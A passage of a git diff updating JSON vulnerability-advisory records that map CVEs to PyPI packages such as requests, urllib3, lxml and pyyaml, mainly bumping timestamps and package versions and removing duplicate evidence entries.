"strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-jc-CVE-2022-40896.json b/advisories/BREW-jc-CVE-2022-40896.json index 45412176981..a5e93679e73 100644 --- a/advisories/BREW-jc-CVE-2022-40896.json +++ b/advisories/BREW-jc-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-jc-CVE-2022-40896", "published": "2026-08-13T17:00:09Z", - "modified": "2026-08-13T17:00:09Z", + "modified": "2026-09-10T19:33:04Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-jc-CVE-2026-4539.json b/advisories/BREW-jc-CVE-2026-4539.json index b9c77b1fc99..81268a0d791 100644 --- a/advisories/BREW-jc-CVE-2026-4539.json +++ b/advisories/BREW-jc-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-jc-CVE-2026-4539", "published": "2026-08-13T17:00:09Z", - "modified": "2026-08-13T17:00:09Z", + "modified": "2026-09-10T19:33:04Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2012-4571.json b/advisories/BREW-oterm-CVE-2012-4571.json index 3b8c31dcbe5..5691e33bfe2 100644 --- a/advisories/BREW-oterm-CVE-2012-4571.json +++ b/advisories/BREW-oterm-CVE-2012-4571.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2012-4571", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-p3h7-3c45-qj4v", "CVE-2012-4571", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2012-5577.json b/advisories/BREW-oterm-CVE-2012-5577.json index ac3d1639860..4cde81bb54e 100644 --- a/advisories/BREW-oterm-CVE-2012-5577.json +++ b/advisories/BREW-oterm-CVE-2012-5577.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2012-5577", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-p86x-652p-6385", "CVE-2012-5577", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2012-5578.json b/advisories/BREW-oterm-CVE-2012-5578.json index 8945ce0f07b..c562792ec1d 100644 --- a/advisories/BREW-oterm-CVE-2012-5578.json +++ b/advisories/BREW-oterm-CVE-2012-5578.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2012-5578", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-8867-vpm3-g98g", "CVE-2012-5578", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2014-1829.json b/advisories/BREW-oterm-CVE-2014-1829.json index e9bb6a9845a..27dc36bae7a 100644 --- a/advisories/BREW-oterm-CVE-2014-1829.json +++ b/advisories/BREW-oterm-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2014-1829", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2014-1830.json b/advisories/BREW-oterm-CVE-2014-1830.json index 935c3e048e3..d3684316360 100644 --- a/advisories/BREW-oterm-CVE-2014-1830.json +++ b/advisories/BREW-oterm-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2014-1830", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2014-3146.json b/advisories/BREW-oterm-CVE-2014-3146.json index 15eb3f9ca51..513a2096a0c 100644 --- a/advisories/BREW-oterm-CVE-2014-3146.json +++ b/advisories/BREW-oterm-CVE-2014-3146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2014-3146", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-57qw-cc2g-pv5p", "CVE-2014-3146", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.3.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-oterm-CVE-2015-2296.json b/advisories/BREW-oterm-CVE-2015-2296.json index 307c7c2397b..edb257079b1 100644 --- a/advisories/BREW-oterm-CVE-2015-2296.json +++ b/advisories/BREW-oterm-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2015-2296", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2015-5237.json b/advisories/BREW-oterm-CVE-2015-5237.json index 59f8fdb9255..ba1aaa35be2 100644 --- a/advisories/BREW-oterm-CVE-2015-5237.json +++ b/advisories/BREW-oterm-CVE-2015-5237.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2015-5237", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-jwvw-v7c5-m82h", "CVE-2015-5237", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.4.0", "resource": "protobuf", - "resource_purl": "pkg:pypi/protobuf@6.33.6" + "resource_purl": "pkg:pypi/protobuf@7.36.1" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "protobuf", - "subject_version": "6.33.6", - "key": "pkg:pypi/protobuf@6.33.6", - "resource": "protobuf" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "6.33.6", - "key": "pkg:pypi/protobuf@6.33.6", + "subject_version": "7.36.1", + "key": "pkg:pypi/protobuf@7.36.1", "resource": "protobuf" } ] diff --git a/advisories/BREW-oterm-CVE-2015-8557.json b/advisories/BREW-oterm-CVE-2015-8557.json index 227115981c4..9cac334bb97 100644 --- a/advisories/BREW-oterm-CVE-2015-8557.json +++ b/advisories/BREW-oterm-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2015-8557", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.1", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-oterm-CVE-2016-10075.json b/advisories/BREW-oterm-CVE-2016-10075.json index a2b79a43f6a..7e51ae57d9a 100644 --- a/advisories/BREW-oterm-CVE-2016-10075.json +++ b/advisories/BREW-oterm-CVE-2016-10075.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2016-10075", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-r7q7-xcjw-qx8q", "CVE-2016-10075", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2016-9015.json b/advisories/BREW-oterm-CVE-2016-9015.json index d810e653a16..fa3fcdfe8cd 100644 --- a/advisories/BREW-oterm-CVE-2016-9015.json +++ b/advisories/BREW-oterm-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2016-9015", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2017-11424.json b/advisories/BREW-oterm-CVE-2017-11424.json index ad59630e4c5..9fa246e1877 100644 --- a/advisories/BREW-oterm-CVE-2017-11424.json +++ b/advisories/BREW-oterm-CVE-2017-11424.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2017-11424", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-r9jw-mwhq-wp62", "CVE-2017-11424", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2017-18342.json b/advisories/BREW-oterm-CVE-2017-18342.json index e087f5957b2..1f2e3afa242 100644 --- a/advisories/BREW-oterm-CVE-2017-18342.json +++ b/advisories/BREW-oterm-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2017-18342", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2018-1000518.json b/advisories/BREW-oterm-CVE-2018-1000518.json index 7388ac21098..3b13053d5f5 100644 --- a/advisories/BREW-oterm-CVE-2018-1000518.json +++ b/advisories/BREW-oterm-CVE-2018-1000518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2018-1000518", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-6g87-ff9q-v847", "CVE-2018-1000518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "16.1.1", - "key": "pkg:pypi/websockets@16.1.1", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2018-18074.json b/advisories/BREW-oterm-CVE-2018-18074.json index 28f1db95f50..3bdfc6311d2 100644 --- a/advisories/BREW-oterm-CVE-2018-18074.json +++ b/advisories/BREW-oterm-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2018-18074", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2018-19787.json b/advisories/BREW-oterm-CVE-2018-19787.json index 8b97fe53d0e..5a9c057e1f9 100644 --- a/advisories/BREW-oterm-CVE-2018-19787.json +++ b/advisories/BREW-oterm-CVE-2018-19787.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2018-19787", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-xp26-p53h-6h2p", "CVE-2018-19787", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.2.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-oterm-CVE-2018-20060.json b/advisories/BREW-oterm-CVE-2018-20060.json index 2def7fe0e8d..3a8d11e2240 100644 --- a/advisories/BREW-oterm-CVE-2018-20060.json +++ b/advisories/BREW-oterm-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2018-20060", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2018-25091.json b/advisories/BREW-oterm-CVE-2018-25091.json index d50ce3d26ed..1e1c8463ab3 100644 --- a/advisories/BREW-oterm-CVE-2018-25091.json +++ b/advisories/BREW-oterm-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2018-25091", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2019-11236.json b/advisories/BREW-oterm-CVE-2019-11236.json index 14e81398521..351d45da335 100644 --- a/advisories/BREW-oterm-CVE-2019-11236.json +++ b/advisories/BREW-oterm-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2019-11236", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2019-11324.json b/advisories/BREW-oterm-CVE-2019-11324.json index 01dd517cd10..476b1853e76 100644 --- a/advisories/BREW-oterm-CVE-2019-11324.json +++ b/advisories/BREW-oterm-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2019-11324", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2019-20477.json b/advisories/BREW-oterm-CVE-2019-20477.json index 7b9e228c1db..cb8dd3fbacb 100644 --- a/advisories/BREW-oterm-CVE-2019-20477.json +++ b/advisories/BREW-oterm-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2019-20477", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2020-14343.json b/advisories/BREW-oterm-CVE-2020-14343.json index 8b81ee1570b..59057917e56 100644 --- a/advisories/BREW-oterm-CVE-2020-14343.json +++ b/advisories/BREW-oterm-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2020-14343", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2020-1747.json b/advisories/BREW-oterm-CVE-2020-1747.json index c7672ec0e8f..a607e1fc3df 100644 --- a/advisories/BREW-oterm-CVE-2020-1747.json +++ b/advisories/BREW-oterm-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2020-1747", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2020-26137.json b/advisories/BREW-oterm-CVE-2020-26137.json index 26c10ca79dc..f462b88fa99 100644 --- a/advisories/BREW-oterm-CVE-2020-26137.json +++ b/advisories/BREW-oterm-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2020-26137", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2020-27783.json b/advisories/BREW-oterm-CVE-2020-27783.json index 436e01b3964..2111ac38cb1 100644 --- a/advisories/BREW-oterm-CVE-2020-27783.json +++ b/advisories/BREW-oterm-CVE-2020-27783.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2020-27783", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-pgww-xf46-h92r", "CVE-2020-27783", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "4.6.2", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.2" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.2", + "key": "pkg:pypi/lxml@6.1.2", "resource": "lxml" } ] diff --git a/advisories/BREW-oterm-CVE-2020-7212.json b/advisories/BREW-oterm-CVE-2020-7212.json index 7f7d25088b9..92dac1211af 100644 --- a/advisories/BREW-oterm-CVE-2020-7212.json +++ b/advisories/BREW-oterm-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2020-7212", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2020-7694.json b/advisories/BREW-oterm-CVE-2020-7694.json index e1b3f1877e3..720d27c713b 100644 --- a/advisories/BREW-oterm-CVE-2020-7694.json +++ b/advisories/BREW-oterm-CVE-2020-7694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2020-7694", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-33c7-2mpw-hg34", "CVE-2020-7694", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.1" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", - "resource": "uvicorn" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-oterm-CVE-2020-7695.json b/advisories/BREW-oterm-CVE-2020-7695.json index 90f24ce067a..fab4f90b53b 100644 --- a/advisories/BREW-oterm-CVE-2020-7695.json +++ b/advisories/BREW-oterm-CVE-2020-7695.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2020-7695", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-f97h-2pfx-f59f", "CVE-2020-7695", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.1" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", - "resource": "uvicorn" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-oterm-CVE-2021-20270.json b/advisories/BREW-oterm-CVE-2021-20270.json index f58036fa8f2..c8953463cda 100644 --- a/advisories/BREW-oterm-CVE-2021-20270.json +++ b/advisories/BREW-oterm-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2021-20270", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-oterm-CVE-2021-22570.json b/advisories/BREW-oterm-CVE-2021-22570.json index d9b68b099ca..58d1056b021 100644 --- 